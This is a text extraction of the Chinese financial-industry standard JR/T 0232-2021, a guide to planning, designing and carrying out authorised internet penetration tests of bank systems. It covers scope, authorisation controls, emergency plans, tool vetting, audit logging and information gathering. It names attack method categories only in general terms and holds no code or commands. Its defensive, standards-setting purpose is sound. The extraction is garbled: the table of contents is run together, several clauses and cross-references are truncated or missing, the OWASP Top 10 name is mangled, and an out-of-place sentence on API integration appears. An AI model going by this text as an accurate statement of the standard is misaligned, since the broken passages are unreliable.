銀行互聯(lián)網(wǎng)滲透測(cè)試指南JR/T0232—2021JR/T0232—2021JR/T0232—2021JR/T0232—2021JR/T0232—2021目??次前言 III引言 IV范圍 1規(guī)范性引用文件 1術(shù)語和定義 1概述 3滲透測(cè)試策劃 3概述 3確定測(cè)試范圍 3確定測(cè)試引用文檔 3確定測(cè)試項(xiàng) 4確定被測(cè)試特性和不被測(cè)試特性 4確定測(cè)試方法與測(cè)試通過準(zhǔn)則 4確定暫停準(zhǔn)則和恢復(fù)條件 4測(cè)試交付項(xiàng) 4確定測(cè)試活動(dòng)、任務(wù)與進(jìn)度 4明確環(huán)境需求 5分配職責(zé)、權(quán)限和各部門間的工作銜接 5明確人員配備和培訓(xùn)目標(biāo) 5明確風(fēng)險(xiǎn)和應(yīng)急措施 5確定質(zhì)量保證過程 5測(cè)試策劃階段文檔 5滲透測(cè)試設(shè)計(jì) 6概述 6確定測(cè)試范圍 6被測(cè)試特征、測(cè)試方法與通過準(zhǔn)則 6測(cè)試用例 6測(cè)試環(huán)境 7測(cè)試過程描述 9測(cè)試就緒評(píng)審 9測(cè)試設(shè)計(jì)階段文檔 10滲透測(cè)試執(zhí)行 107.1概述 10信息收集 10威脅建模 11I1111IIII漏洞發(fā)現(xiàn) 12滲透攻擊 14測(cè)試執(zhí)行階段文檔 15滲透測(cè)試總結(jié) 158.1概述 15測(cè)試數(shù)據(jù)分析 15差異分析 15風(fēng)險(xiǎn)決策根據(jù)分析 15報(bào)告編寫 16測(cè)試評(píng)審 17測(cè)試總結(jié)階段文檔 17附錄A（資料性）銀行互聯(lián)網(wǎng)滲透測(cè)試過程要點(diǎn)清單 18附錄B（資料性）銀行互聯(lián)網(wǎng)滲透測(cè)試漏洞風(fēng)險(xiǎn)定級(jí)參考 21參考文獻(xiàn) 26JR/T0232—2021JR/T0232—2021JR/T0232—2021JR/T0232—2021銀行互聯(lián)網(wǎng)滲透測(cè)試指南范圍本文件提供了在銀行信息系統(tǒng)中開展互聯(lián)網(wǎng)滲透測(cè)試的整體流程以及流程各個(gè)環(huán)節(jié)中保障測(cè)試質(zhì)量、控制測(cè)試風(fēng)險(xiǎn)的指南。本文件適用于銀行互聯(lián)網(wǎng)滲透測(cè)試的策劃、設(shè)計(jì)、執(zhí)行、總結(jié)，也供保險(xiǎn)、證券等其他金融行業(yè)參考。規(guī)范性引用文件下列文件中的內(nèi)容通過文中的規(guī)范性引用而構(gòu)成本文件必不可少的條款。其中，注日期的引用（包括所有的修改單）適用于本文件。GB/T15532—2008計(jì)算機(jī)軟件測(cè)試規(guī)范GB/T25069—2010信息安全技術(shù)術(shù)語GB/T29246—2017信息技術(shù)安全技術(shù)信息安全管理體系概述和詞匯JR/T0101—2013銀行業(yè)軟件測(cè)試文檔規(guī)范術(shù)語和定義GB/T25069—2010和GB/T29246—2017界定的以及下列術(shù)語和定義適用于本文件。3.1滲透測(cè)試penetrationtest滲透性測(cè)試穿透性測(cè)試以模擬真實(shí)攻擊的動(dòng)作，檢測(cè)發(fā)現(xiàn)信息系統(tǒng)存在的技術(shù)漏洞，并利用漏洞突破信息系統(tǒng)的安全控制機(jī)制，進(jìn)而評(píng)估信息系統(tǒng)面臨的實(shí)際安全風(fēng)險(xiǎn)的一種測(cè)試手段。[來源：GB/T25069—2010,2.3.87,有修改]3.2授權(quán)authorization通過技術(shù)手段界定滲透測(cè)試實(shí)施范圍的過程。示例：通過防火墻策略僅允許滲透測(cè)試實(shí)施人員訪問測(cè)試范圍內(nèi)的信息系統(tǒng)。[來源：GB/T25069—2010,2.1.33,有修改]3.3威脅代理threatagent有動(dòng)機(jī)和能力破壞信息系統(tǒng)安全性的人或程序。示例：企圖通過攻擊信息系統(tǒng)非法獲取資金的黑客團(tuán)伙。3.4PAGEPAGE3PAGEPAGE26威脅建模threatmodeling對(duì)信息系統(tǒng)的資產(chǎn)、流程、攻擊信息系統(tǒng)的主要?jiǎng)訖C(jī)、潛在威脅代理及其能力等進(jìn)行分析，對(duì)相關(guān)的主體和關(guān)系進(jìn)行有效組織。注：威脅建模的目的是構(gòu)建信息系統(tǒng)面臨的最可能攻擊場(chǎng)景。3.5敏感信息sensitiveinformation由權(quán)威機(jī)構(gòu)確定的必須受保護(hù)的信息，該信息的泄露、修改、破壞或丟失會(huì)對(duì)人或事產(chǎn)生可預(yù)知的損害。注：敏感信息的具體分級(jí)標(biāo)準(zhǔn)宜參考JR/T0197—2020。[來源：GB/T25069—2010,]3.6漏洞vulnerability脆弱性弱點(diǎn)信息系統(tǒng)中可能被攻擊者利用的薄弱環(huán)節(jié)。[來源：GB/T25069—20102.3.30,有修改]3.7實(shí)施風(fēng)險(xiǎn)implementrisk滲透測(cè)試實(shí)施過程中可能對(duì)目標(biāo)信息系統(tǒng)的保密性、完整性、可用性帶來的影響。3.8訪問控制accesscontrol一種保證數(shù)據(jù)處理系統(tǒng)的資源只能由被授權(quán)主體按授權(quán)方式進(jìn)行訪問的手段。[來源：GB/T25069—202]3.9仿真環(huán)境simulationenvironment為避免直接在目標(biāo)信息系統(tǒng)中實(shí)施測(cè)試所引入的實(shí)施風(fēng)險(xiǎn)，仿照目標(biāo)信息系統(tǒng)搭建且具備測(cè)試所需的各項(xiàng)條件的滲透測(cè)試實(shí)施環(huán)境。示例：業(yè)務(wù)系統(tǒng)及配置與生產(chǎn)一致的測(cè)試環(huán)境；生產(chǎn)環(huán)境中與生產(chǎn)服務(wù)器配置一致但不承載實(shí)際業(yè)務(wù)的模擬服務(wù)器；與生產(chǎn)高度一致的網(wǎng)絡(luò)靶場(chǎng)環(huán)境。3.10權(quán)限提升privilegeescalation在低權(quán)限用戶狀態(tài)下，利用信息系統(tǒng)中存在的漏洞突破權(quán)限控制，獲得該用戶原本不具備的操作權(quán)限的過程。示例：利用操作系統(tǒng)漏洞從普通用戶權(quán)限提升為超級(jí)管理員用戶權(quán)限。3.11現(xiàn)場(chǎng)清理siteclearing滲透測(cè)試實(shí)施完畢后，將目標(biāo)信息系統(tǒng)恢復(fù)到測(cè)試前狀態(tài)的過程。示例：刪除上傳到目標(biāo)信息系統(tǒng)中的測(cè)試腳本。3.12應(yīng)急預(yù)案contingencyplan一種關(guān)于備份、應(yīng)急響應(yīng)和災(zāi)后恢復(fù)的計(jì)劃。[來源：GB/T25069—2010,]3.13保密性confidentiality信息對(duì)未授權(quán)的個(gè)人、實(shí)體或過程不可用或不泄露的特性。[來源：GB/T29246—2017,2.12]3.14完整性integrity準(zhǔn)確和完備的特性。[來源：GB/T29246—2017,2.40]3.15可用性availability根據(jù)授權(quán)實(shí)體的要求可訪問和可使用的特性。[來源：GB/T29246—2017,2.9]3.16遵從性compliance遵守指導(dǎo)活動(dòng)的相關(guān)條款的程度。概述銀行互聯(lián)網(wǎng)滲透測(cè)試是指從互聯(lián)網(wǎng)渠道發(fā)起的針對(duì)銀行信息系統(tǒng)的滲透測(cè)試，宜按照GB/T15532—2008中4.3規(guī)定的要求，將測(cè)試流程劃分為策劃、設(shè)計(jì)、執(zhí)行、總結(jié)四個(gè)階段，并根據(jù)整體JR/T0101—2013中4.4.3規(guī)定的要求，給出的單項(xiàng)測(cè)試三級(jí)規(guī)范編制。滲透測(cè)試策劃概述滲透測(cè)試策劃（以下簡稱測(cè)試策劃）主要進(jìn)行滲透測(cè)試需求分析，包括確定測(cè)試范圍，確定測(cè)試引用文檔，確定測(cè)試項(xiàng)以及被測(cè)試特性和不被測(cè)試特性，確定測(cè)試方法與測(cè)試通過準(zhǔn)則，確定暫停準(zhǔn)則和恢復(fù)條件，規(guī)定測(cè)試活動(dòng)、任務(wù)與進(jìn)度，明確環(huán)境需求，分配職責(zé)、權(quán)限和各部門間的工作銜接，明確人員配備和培訓(xùn)目標(biāo)，明確風(fēng)險(xiǎn)和應(yīng)急措施，確定質(zhì)量保證過程。在測(cè)試過程中，如發(fā)現(xiàn)在測(cè)試規(guī)劃階段確定的內(nèi)容有變化，宜及時(shí)變更測(cè)試策劃，并妥善管理測(cè)試策劃的版本。應(yīng)用程序編程接口（API，ApplicationProgrammingInterface）方式接入前，需要進(jìn)行接入方系統(tǒng)改造和接口開發(fā)，并與接口平臺(tái)開展聯(lián)調(diào)測(cè)試，其中功能測(cè)試和業(yè)務(wù)場(chǎng)景測(cè)試是必做項(xiàng)。確定測(cè)試范圍概述本滲透測(cè)試涉及到的范圍及其特征。示例：本滲透測(cè)試在因特網(wǎng)中國境內(nèi)網(wǎng)段，針對(duì)實(shí)際生產(chǎn)環(huán)境進(jìn)行。確定測(cè)試引用文檔確定開展?jié)B透測(cè)試所考慮的需求因素，每個(gè)文檔宜明確具體的標(biāo)識(shí)（包括版本）和條款，典型的引用文檔包括：國家監(jiān)管制度。金融行業(yè)監(jiān)管制度。組織自身安全管理策略規(guī)范。團(tuán)體組織準(zhǔn)入規(guī)范。示例：支付卡行業(yè)安全標(biāo)準(zhǔn)委員會(huì)（PCISSC，PaymentCardIndustrySecurityStandardsCouncil）、環(huán)球銀行金融電信協(xié)會(huì)（SWIFT，SocietyWorldwideInterbankFinancialTelecommunication）等團(tuán)體組織均有定期對(duì)特定信息系統(tǒng)進(jìn)行滲透測(cè)試的相關(guān)規(guī)范。業(yè)務(wù)需求以及非功能需求。示例：某些重要業(yè)務(wù)系統(tǒng)需要很高的安全性，上線前和（或）上線后可能會(huì)提出專項(xiàng)的滲透測(cè)試需求。確定測(cè)試項(xiàng)根據(jù)界定的測(cè)試范圍，確定具體的滲透測(cè)試對(duì)象。測(cè)試項(xiàng)宜能夠進(jìn)行明確的標(biāo)識(shí)和界定。示例：測(cè)試項(xiàng)通過具有唯一性的屬性予以標(biāo)識(shí)的例子包括互聯(lián)網(wǎng)協(xié)議（IP，InternetProtocol）地址、域名、域名+統(tǒng)一資源定位符（URL，UniformResourceLocators）、客戶端程序版本、客戶端程序文件哈希值。當(dāng)測(cè)試范圍為因特網(wǎng)中國境內(nèi)網(wǎng)段實(shí)際生產(chǎn)環(huán)境時(shí)，測(cè)試項(xiàng)為銀行的整個(gè)信息與通信（ICT，InformationandCommunicationsTechnology）系統(tǒng)。確定被測(cè)試特性和不被測(cè)試特性確定具體的滲透測(cè)試特性，即滲透測(cè)試針對(duì)測(cè)試項(xiàng)的哪些方面和不針對(duì)哪些方面。示例：當(dāng)測(cè)試范圍為因特網(wǎng)中國境內(nèi)網(wǎng)段，測(cè)試項(xiàng)為銀行的整個(gè)ICT系統(tǒng)時(shí)，被測(cè)試特性為針對(duì)通用信息技術(shù)產(chǎn)品的通過互聯(lián)網(wǎng)的攻擊和利用應(yīng)用系統(tǒng)業(yè)務(wù)需求邏輯漏洞進(jìn)行的攻擊。不被測(cè)試特性包括高級(jí)可持續(xù)威脅（APT，AdvancedPersistentThreat）攻擊和分布式拒絕服務(wù)（DDOS，DistributedDenyOfService）攻擊。確定測(cè)試方法與測(cè)試通過準(zhǔn)則根據(jù)滲透測(cè)試的目的、內(nèi)容以及實(shí)施特性，選定滲透測(cè)試方法，明確成功實(shí)施該測(cè)試的準(zhǔn)則。示例：滲透測(cè)試全流程中典型的測(cè)試方法包括：搜索，如基于搜索引擎收集信息。掃描，如通過自動(dòng)化掃描工具收集信息或檢測(cè)漏洞。監(jiān)聽，如通過網(wǎng)絡(luò)監(jiān)聽竊取未加密敏感信息。篡改，如篡改上傳服務(wù)端的交易數(shù)據(jù)。繞過，如繞過登錄控制直接訪問敏感信息。濫用，如惡意、頻繁地使用正常的業(yè)務(wù)功能。破解，如破解相關(guān)密碼算法還原加密的敏感信息。逆向，如通過動(dòng)態(tài)調(diào)試、反編譯等方式掌握程序的運(yùn)行邏輯。注入，如輸入包含惡意代碼的數(shù)據(jù)。確定暫停準(zhǔn)則和恢復(fù)條件包括計(jì)劃內(nèi)暫停和計(jì)劃外暫停兩種情況。在暫停后恢復(fù)時(shí)，宜關(guān)注是否需要進(jìn)行回歸測(cè)試。測(cè)試交付項(xiàng)，宜確定為可交付項(xiàng)。確定測(cè)試活動(dòng)、任務(wù)與進(jìn)度明確準(zhǔn)備和執(zhí)行滲透測(cè)試的主要活動(dòng)、任務(wù)和所需的時(shí)間周期，粒度宜符合實(shí)際需要，對(duì)不同的活動(dòng)、任務(wù)可按照不同的粒度進(jìn)行規(guī)劃。明確各項(xiàng)任務(wù)間的所有依賴關(guān)系和所需要的任何特殊技能。示例：在典型情況下，具體的實(shí)施計(jì)劃宜包括測(cè)試的起始時(shí)間點(diǎn)、測(cè)試的結(jié)束時(shí)間點(diǎn)或結(jié)束標(biāo)志，以及測(cè)試周期內(nèi)的具體實(shí)施時(shí)間段。明確環(huán)境需求典型的測(cè)試環(huán)境需求包括但不限于：所需的硬件。所需的軟件，包括基礎(chǔ)軟件和測(cè)試工具軟件。所需的特殊硬件設(shè)備。所需的網(wǎng)絡(luò)環(huán)境，包括網(wǎng)絡(luò)種類、帶寬、賬號(hào)。測(cè)試所需的基礎(chǔ)數(shù)據(jù)。測(cè)試設(shè)計(jì)和執(zhí)行的物理場(chǎng)地與辦公設(shè)施。測(cè)試所需的銀行產(chǎn)品憑據(jù)。分配職責(zé)、權(quán)限和各部門間的工作銜接確定負(fù)責(zé)管理、設(shè)計(jì)、準(zhǔn)備、執(zhí)行、監(jiān)督和解決問題的各個(gè)小組，實(shí)現(xiàn)所有的工作任務(wù)均有任務(wù)屬主，且明確承擔(dān)相關(guān)屬主角色之間的不兼容職責(zé)。所有參與者從承擔(dān)責(zé)任上分為任務(wù)屬主或參與者。從時(shí)間投入上分為全職人員或共享人員。宜確定這些個(gè)人和小組之間交流的內(nèi)容和方法，包括闡明信息流和數(shù)據(jù)流的圖表。按最小權(quán)限原則對(duì)滲透測(cè)試全體人員進(jìn)行合理授權(quán)。對(duì)涉及到內(nèi)部網(wǎng)絡(luò)的，宜僅開通測(cè)試所需的網(wǎng)絡(luò)訪問范圍和相關(guān)支撐系統(tǒng)、應(yīng)用系統(tǒng)所必要的用戶權(quán)限。對(duì)所有滲透測(cè)試涉及的文檔（包括本計(jì)劃）、工具、數(shù)據(jù)的歸屬、共享做出規(guī)定。明確人員配備和培訓(xùn)目標(biāo)根據(jù)任務(wù)和設(shè)置的小組與職責(zé)提出對(duì)人員的配備和技能的需求，對(duì)不具備相關(guān)技能的情況，說明如何進(jìn)行培訓(xùn)。示例：指導(dǎo)組、工具組、環(huán)境組人員來自專業(yè)團(tuán)隊(duì)且已經(jīng)具備了所需的知識(shí)與技能。設(shè)計(jì)組需外部專家指導(dǎo)且明確風(fēng)險(xiǎn)和應(yīng)急措施標(biāo)識(shí)測(cè)試策劃的風(fēng)險(xiǎn)假設(shè)，提出應(yīng)對(duì)各種風(fēng)險(xiǎn)的應(yīng)急措施。示例：本滲透測(cè)試可預(yù)料到的風(fēng)險(xiǎn)和應(yīng)急措施包括：對(duì)生產(chǎn)環(huán)境可能導(dǎo)致的破壞風(fēng)險(xiǎn)，應(yīng)急措施為提前編制應(yīng)急預(yù)案，提前備份敏感數(shù)據(jù)及重要系統(tǒng)。該功能涉及到應(yīng)用系統(tǒng)的修復(fù)。產(chǎn)業(yè)務(wù)高峰期，限制自動(dòng)化工具的并發(fā)數(shù)。測(cè)試過程中誤操作可能導(dǎo)致的風(fēng)險(xiǎn)，應(yīng)急措施為測(cè)試均應(yīng)采用腳本化方式，操作時(shí)雙人實(shí)施。數(shù)據(jù)，以便后期通過回歸測(cè)試復(fù)現(xiàn)測(cè)試過程。確定質(zhì)量保證過程明確為保證測(cè)試過程和產(chǎn)品質(zhì)量所用的方法，包含或引用異常的跟蹤和解決過程。示例：所有的滲透測(cè)試均經(jīng)過設(shè)計(jì)，編制了測(cè)試規(guī)格說明并經(jīng)過評(píng)審。所有的測(cè)試過程均編制了測(cè)試日志，經(jīng)質(zhì)量控制人員審核，記錄內(nèi)容與測(cè)試過程一致。編制了測(cè)試總結(jié)報(bào)告并通過評(píng)審。測(cè)試策劃階段文檔在測(cè)試策劃階段，宜按照J(rèn)R/T0101—2013中第5章規(guī)定的要求，制定測(cè)試策劃。在本測(cè)試復(fù)用JR/T0101—2013中第10JR/T0101—2013中第15JR/T0101—2013中第9章規(guī)定的要求編制；測(cè)試日志宜按照J(rèn)R/T0101—2013中第11章規(guī)定的要求編制，測(cè)試總結(jié)報(bào)告宜按照J(rèn)R/T0101—2013中第14章規(guī)定的要求編制。滲透測(cè)試設(shè)計(jì)概述滲透測(cè)試設(shè)計(jì)（以下簡稱測(cè)試設(shè)計(jì)）是按照測(cè)試策劃，進(jìn)一步細(xì)化針對(duì)被測(cè)試特征的測(cè)試方法和通過準(zhǔn)則，選用已有的測(cè)試用例或設(shè)計(jì)新的測(cè)試用例；獲取并驗(yàn)證測(cè)試數(shù)據(jù)；確定測(cè)試用例執(zhí)行順序的測(cè)試規(guī)程；準(zhǔn)備測(cè)試工具并在必要時(shí)開發(fā)測(cè)試軟件；建立并驗(yàn)證測(cè)試環(huán)境；進(jìn)行測(cè)試就緒評(píng)審。在測(cè)試設(shè)計(jì)過程中，發(fā)現(xiàn)測(cè)試策劃需要變更的，宜在經(jīng)過評(píng)審后及時(shí)變更測(cè)試策劃，使測(cè)試策劃與測(cè)試規(guī)格保持一致與協(xié)調(diào)。確定測(cè)試范圍說明本滲透測(cè)試涉及到的范圍及其特征。若測(cè)試策劃的范圍描述已經(jīng)能夠滿足對(duì)不同測(cè)試方法的設(shè)計(jì)，則可直接參考該測(cè)試策劃。在必要時(shí)，可針對(duì)測(cè)試策劃中描述的測(cè)試范圍有選擇地進(jìn)行細(xì)化，以說明應(yīng)用相關(guān)測(cè)試方法的必要性。被測(cè)試特征、測(cè)試方法與通過準(zhǔn)則在測(cè)試策劃描述的測(cè)試項(xiàng)、測(cè)試方法與測(cè)試通過準(zhǔn)則的基礎(chǔ)上，針對(duì)每一測(cè)試特征，在必要時(shí)細(xì)化測(cè)試方法。描述的粒度宜能按照給定的方法進(jìn)行測(cè)試用例和測(cè)試規(guī)程的設(shè)計(jì)。示例：測(cè)試項(xiàng)、測(cè)試方法與測(cè)試通過準(zhǔn)則見測(cè)試策劃。測(cè)試用例測(cè)試用例標(biāo)識(shí)規(guī)則明確測(cè)試用例描述的方式。不論采用哪種方式，均可唯一定位和檢索，并說明使用的規(guī)則與注意事項(xiàng)。測(cè)試用例概述對(duì)相關(guān)測(cè)試用例集合中每個(gè)輸入都有效的約束條件。任何共享環(huán)境的需求。對(duì)共享的特殊規(guī)程的規(guī)定。共享的測(cè)試用例之間的依賴關(guān)系。測(cè)試用例詳述概述每個(gè)或每組測(cè)試用例均宜遵循的規(guī)范，具體如下：對(duì)應(yīng)的測(cè)試要點(diǎn)。適用測(cè)試規(guī)程（場(chǎng)景）描述。測(cè)試用例的輸入和預(yù)期的結(jié)果。測(cè)試結(jié)果判定方法。案例實(shí)施所需數(shù)據(jù)，如用戶。A。測(cè)試用例宜滿足的特殊需求。宜對(duì)測(cè)試用例潛在的實(shí)施風(fēng)險(xiǎn)及應(yīng)急措施進(jìn)行說明。生產(chǎn)環(huán)境下的滲透測(cè)試所使用的用戶宜提前備案并全程監(jiān)控。測(cè)試用例編號(hào)為本測(cè)試用例賦予一個(gè)唯一標(biāo)識(shí)符，以便將其與其他測(cè)試用例區(qū)分開，宜通過自動(dòng)工具生成標(biāo)識(shí)符。輸入與輸出說明（或測(cè)試方法（或預(yù)期可能接收到的反饋。宜參1OWAPTop0OpenWebAppicaionSeuriyProjectTop10）（見7.4）和攻擊驗(yàn)證內(nèi)容（見7.5.1）的每一項(xiàng)的用例制定明確的輸入和輸出說明，規(guī)定所有合適的數(shù)據(jù)庫、文件、配置參數(shù)、接口報(bào)文、輸入終端、內(nèi)存駐留區(qū)域及操作系統(tǒng)傳送的各個(gè)值。對(duì)于新技術(shù)、新業(yè)務(wù)場(chǎng)景等原因無法明確測(cè)試輸入輸出的，可采用莽撞測(cè)試的方法，宜描述具體數(shù)據(jù)記錄的方法，但相關(guān)測(cè)試宜由具有三年以上滲透測(cè)試工作經(jīng)驗(yàn)的測(cè)試人員完成，并提前獲得測(cè)試需求方授權(quán)。規(guī)定輸入之間的所有必要的關(guān)系。示例：輸入存在時(shí)序，前導(dǎo)交易和后繼交易均為輸入之間的關(guān)系。采用的測(cè)試設(shè)計(jì)方法6.3注：本節(jié)的目的是使得所有測(cè)試用例都采用了已經(jīng)確定的測(cè)試設(shè)計(jì)方法。對(duì)其他用例依賴關(guān)系列出本測(cè)試用例與其他用例的依賴關(guān)系，宜區(qū)分以下情況：其他用例是執(zhí)行本測(cè)試用例的必要條件。本測(cè)試用例是執(zhí)行其他用例的必要條件。特殊需求說明描述執(zhí)行本測(cè)試用例時(shí)特殊的需求，包括但不限于管理需求、對(duì)人員的需求。對(duì)環(huán)境的需求宜在6.5中描述，本測(cè)試用例屬于特殊情況的，宜在本節(jié)提及。測(cè)試環(huán)境描述啟動(dòng)滲透測(cè)試、執(zhí)行滲透測(cè)試和記錄結(jié)果所需的測(cè)試環(huán)境，通常按每個(gè)（或每組）場(chǎng)景進(jìn)行描述，可使用一個(gè)（或多個(gè)）圖形來展示所有的環(huán)境組成成分及其間信息交互。滲透測(cè)試環(huán)境描述策略，具體如下：當(dāng)滲透測(cè)試環(huán)境為生產(chǎn)環(huán)境時(shí)，可僅描述測(cè)試現(xiàn)場(chǎng)所需的環(huán)境。當(dāng)在測(cè)試策劃中對(duì)環(huán)境的描述足夠清晰和細(xì)致的情況下，以及在單獨(dú)制定了測(cè)試環(huán)境需求規(guī)格說明和（或）測(cè)試數(shù)據(jù)需求規(guī)格說明時(shí)，本節(jié)可直接引用這些文檔。當(dāng)測(cè)試策劃、測(cè)試環(huán)境需求規(guī)格說明、測(cè)試數(shù)據(jù)需求規(guī)格說明發(fā)生變更時(shí)，本節(jié)宜對(duì)變更情況進(jìn)行詳細(xì)描述。僅為部分特殊的測(cè)試用例需求的測(cè)試環(huán)境，可不在本節(jié)描述。測(cè)試執(zhí)行環(huán)境滲透測(cè)試實(shí)施前宜完成各項(xiàng)環(huán)境準(zhǔn)備工作，具體如下：基礎(chǔ)環(huán)境準(zhǔn)備工作，當(dāng)在為滲透測(cè)試專門搭建的仿真環(huán)境進(jìn)行測(cè)試時(shí)，需說明與生產(chǎn)環(huán)境的差異并評(píng)價(jià)可比性，主要包括：測(cè)試所需的系統(tǒng)資源，包括硬件、基礎(chǔ)軟件和支撐軟件等。測(cè)試所需的網(wǎng)絡(luò)資源，包括硬件、地址、端口、賬號(hào)等。應(yīng)用系統(tǒng)。測(cè)試基礎(chǔ)數(shù)據(jù)。監(jiān)控審計(jì)環(huán)境準(zhǔn)備工作，確保測(cè)試過程得到有效的監(jiān)控和記錄，該環(huán)境宜滿足：所有網(wǎng)絡(luò)流量均得以記錄，并在所需的時(shí)間周期（例如半年）內(nèi)可用。所有終端操作均得以記錄，并在所需的時(shí)間周期（例如半年）內(nèi)可用。終端操作記錄方式可通過錄屏、命令行日志記錄等方式實(shí)現(xiàn)。已采取信息防泄漏措施。對(duì)基礎(chǔ)環(huán)境及監(jiān)控審計(jì)環(huán)境的有效性設(shè)立了檢查確認(rèn)準(zhǔn)則。測(cè)試工具準(zhǔn)備滲透測(cè)試實(shí)施前宜完成各項(xiàng)工具準(zhǔn)備工作，具體如下：準(zhǔn)備以下常用滲透測(cè)試工具：信息收集工具，如端口掃描工具、目錄枚舉工具、網(wǎng)絡(luò)監(jiān)聽工具等。漏洞掃描工具，如網(wǎng)站漏洞掃描工具、系統(tǒng)層漏洞掃描工具等。漏洞利用工具，如暴力破解工具、數(shù)據(jù)包攔截和篡改工具、典型高危漏洞的專用工具等。測(cè)試文檔管理工具。缺陷管理工具。非實(shí)施方自主開發(fā)測(cè)試工具宜具備可跟蹤的、合規(guī)的獲取路徑。實(shí)施方自主開發(fā)測(cè)試工具宜由實(shí)施方進(jìn)行工具安全性審查，重點(diǎn)審核不包含與銀行互聯(lián)網(wǎng)滲透測(cè)試實(shí)施無關(guān)的功能。對(duì)擬采用的工具進(jìn)行詳細(xì)記錄，包括但不限于：工具名稱。工具用途。工具提供方。工具獲取途徑。工具版本號(hào)。工具的散列值。測(cè)試驗(yàn)證授權(quán)對(duì)授權(quán)策略的執(zhí)行情況進(jìn)行驗(yàn)證，具體如下：測(cè)試實(shí)施人員宜具有達(dá)成測(cè)試目標(biāo)所需的必要權(quán)限，包括以下內(nèi)容：測(cè)試對(duì)象網(wǎng)絡(luò)可達(dá)。具有特定權(quán)限的測(cè)試用戶。根據(jù)測(cè)試目標(biāo)配置合理的安全策略，包括以下內(nèi)容：單純以發(fā)現(xiàn)應(yīng)用軟件漏洞為目標(biāo)的測(cè)試，宜通過白名單策略，放開對(duì)測(cè)試源的限制。以驗(yàn)證目標(biāo)系統(tǒng)整體安全防護(hù)狀況為目標(biāo)的測(cè)試，不宜單獨(dú)為測(cè)試源開通特殊安全策略。采取有效措施來控制測(cè)試實(shí)施人員行為超越授權(quán)范圍的風(fēng)險(xiǎn)，包括以下內(nèi)容：防火墻隔離。邊界監(jiān)控。日志審計(jì)。測(cè)試過程描述日志列出記錄日志的工具和方法，記錄的內(nèi)容包括測(cè)試執(zhí)行的結(jié)果，任何觀測(cè)到的異常，以及任何其他有關(guān)測(cè)試的事件。建立提供準(zhǔn)備執(zhí)行規(guī)程所需的動(dòng)作序列。典型地，信息收集、威脅建模、漏洞發(fā)現(xiàn)都是建立的重要?jiǎng)幼鳌?dòng)提供開始執(zhí)行規(guī)程所需的動(dòng)作。典型地，滲透攻擊是啟動(dòng)的重要?jiǎng)幼?。處理提供在?guī)程執(zhí)行過程中所需的動(dòng)作。若測(cè)試用例按照?qǐng)鼍盎蛳盗袌?chǎng)景設(shè)計(jì)，即由多組輸入、輸出的有序排列構(gòu)成，則不必在此重復(fù)描述測(cè)試用例的執(zhí)行序列。本文件描述的攻擊過程（見7.5.2）是典型的處理過程。度量描述如何進(jìn)行測(cè)試度量。度量可以是多維度的，例如對(duì)進(jìn)度的度量和對(duì)測(cè)試結(jié)果的度量。暫停因計(jì)劃外事件導(dǎo)致的臨時(shí)暫停，描述測(cè)試所需的動(dòng)作。對(duì)已經(jīng)在測(cè)試策劃中描述了暫停的，此處引用即可。再啟動(dòng)規(guī)定所有再啟動(dòng)點(diǎn)，描述在各再啟動(dòng)點(diǎn)上重新啟動(dòng)規(guī)程所必需的動(dòng)作。對(duì)已經(jīng)在測(cè)試策劃中描述了再啟動(dòng)的，此處引用即可。停止描述正常停止執(zhí)行時(shí)所必需的動(dòng)作。結(jié)束描述在運(yùn)行的規(guī)程全部執(zhí)行完成后（包括終止記錄日志），恢復(fù)環(huán)境所必需的動(dòng)作。典型地，包括回收用于測(cè)試的權(quán)限。應(yīng)急描述處理執(zhí)行過程中可能發(fā)生的異常事件所必需的動(dòng)作。測(cè)試就緒評(píng)審在測(cè)試執(zhí)行前，宜對(duì)測(cè)試策劃和測(cè)試設(shè)計(jì)進(jìn)行評(píng)審，評(píng)審測(cè)試策劃的合理性、測(cè)試環(huán)境和測(cè)試工具的有效性，以及測(cè)試用例的可操作性和覆蓋充分性等。評(píng)審的主要內(nèi)容有：評(píng)審測(cè)試策劃的合理性，包括測(cè)試目標(biāo)、測(cè)試項(xiàng)、測(cè)試內(nèi)容、測(cè)試方法、時(shí)間計(jì)劃及授權(quán)策略等的合理性。評(píng)審測(cè)試環(huán)境和測(cè)試工具的有效性。評(píng)審測(cè)試用例的可操作性和充分性。測(cè)試設(shè)計(jì)階段文檔在測(cè)試設(shè)計(jì)過程中，宜按照J(rèn)R/T0101—2013中第9章規(guī)定的要求，編制測(cè)試規(guī)格說明。對(duì)認(rèn)為本滲透測(cè)試文檔具有高度復(fù)用價(jià)值的，宜按照J(rèn)R/T0101—2013中第6、7、8章規(guī)定的要求，分別編制測(cè)試設(shè)計(jì)說明、測(cè)試用例說明和測(cè)試規(guī)程說明。在本測(cè)試復(fù)用概率較低且對(duì)后繼工作影響較小情JR/T0101—2013中第10JR/T0101—2013中第15如有必要，測(cè)試環(huán)境需求規(guī)格說明宜參照J(rèn)R/T0101—2013中附錄D.4規(guī)定的要求，測(cè)試數(shù)據(jù)需求規(guī)格說明宜參照J(rèn)R/T0101—2013中附錄D.5規(guī)定的要求。滲透測(cè)試執(zhí)行概述滲透測(cè)試執(zhí)行（以下簡稱測(cè)試執(zhí)行）是按照設(shè)計(jì)的過程執(zhí)行測(cè)試用例，獲得滲透測(cè)試結(jié)果，編制測(cè)試日志；分析并判定滲透測(cè)試是否達(dá)到預(yù)期以及是否進(jìn)行多輪測(cè)試；測(cè)試結(jié)束前，審核測(cè)試記錄文檔是否完整、有效、一致；在測(cè)試過程中，如出現(xiàn)異常情況，按照測(cè)試設(shè)計(jì)進(jìn)行處理并編制測(cè)試事件報(bào)告；完成全部預(yù)定的測(cè)試任務(wù)后，清理測(cè)試現(xiàn)場(chǎng)。在應(yīng)急測(cè)試時(shí)，編制測(cè)試綜合報(bào)告中涉及到測(cè)試執(zhí)行的相關(guān)內(nèi)容。信息收集滲透測(cè)試的信息收集宜根據(jù)具體的測(cè)試范圍、測(cè)試引用文檔和測(cè)試項(xiàng)，結(jié)合測(cè)試需求方提供的信息，在測(cè)試需求方認(rèn)同并知曉的情況下，通過滲透收集或刺探性收集?；A(chǔ)信息收集滲透測(cè)試宜嘗試進(jìn)行基礎(chǔ)信息收集，具體如下：網(wǎng)絡(luò)信息，包括但不限于：域名解析記錄。IP開放端口。系統(tǒng)信息，包括但不限于：設(shè)備類型。已安裝的軟件，如中間件、數(shù)據(jù)庫、虛擬化軟件等。操作系統(tǒng)和已安裝軟件的官方補(bǔ)丁列表。應(yīng)用信息，包括但不限于：開發(fā)語言。開源框架或插件。功能接口。URL業(yè)務(wù)功能。業(yè)務(wù)面向的用戶